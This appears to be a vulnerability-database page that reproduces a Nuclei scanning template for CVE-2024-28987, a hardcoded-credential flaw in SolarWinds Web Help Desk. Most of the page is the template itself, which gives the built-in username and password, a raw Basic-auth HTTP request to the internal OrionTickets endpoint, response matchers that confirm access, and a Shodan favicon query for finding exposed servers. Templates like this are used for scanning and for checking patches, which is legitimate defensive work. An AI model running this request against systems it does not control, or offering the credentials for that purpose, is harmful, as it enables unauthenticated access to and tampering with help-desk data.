漏洞描述
The SolarWinds Web Help Desk (WHD) software is affected by a hardcoded credential vulnerability, allowing remote unauthenticated user to access internal functionality and modify data.
CVE-2024-28987: SolarWinds Web Help Desk - Hardcoded Credential
PoC代码[已公开]
id: CVE-2024-28987
info:
name: SolarWinds Web Help Desk - Hardcoded Credential
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
The SolarWinds Web Help Desk (WHD) software is affected by a hardcoded credential vulnerability, allowing remote unauthenticated user to access internal functionality and modify data.
reference:
- https://support.solarwinds.com/SuccessCenter/s/article/SolarWinds-Web-Help-Desk-12-8-3-Hotfix-2
- https://www.solarwinds.com/trust-center/security-advisories/cve-2024-28987
- https://nvd.nist.gov/vuln/detail/CVE-2024-28987
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2024-28987
cwe-id: CWE-798
epss-score: 0.9429
epss-percentile: 0.99935
metadata:
verified: true
max-request: 1
shodan-query: http.favicon.hash:1895809524
tags: cve,cve2024,exposure,solarwinds,help-desk,kev,vkev,vuln
variables:
username: "helpdeskIntegrationUser"
password: "dev-C4F8025E7"
http:
- raw:
- |
GET /helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(username+':'+password)}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
part: body
words:
- displayClient
- shortDetail
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100f00cb912a2f15612b5ea76cdd8534fce1d3538713f80fe535b419b34ef1426df022100d9cdebad296af59a51e78370de33fc6cdf5ade22c58f7fbc64aa7b7a0be4fe37:922c64590222798bb761d5b6d8e72950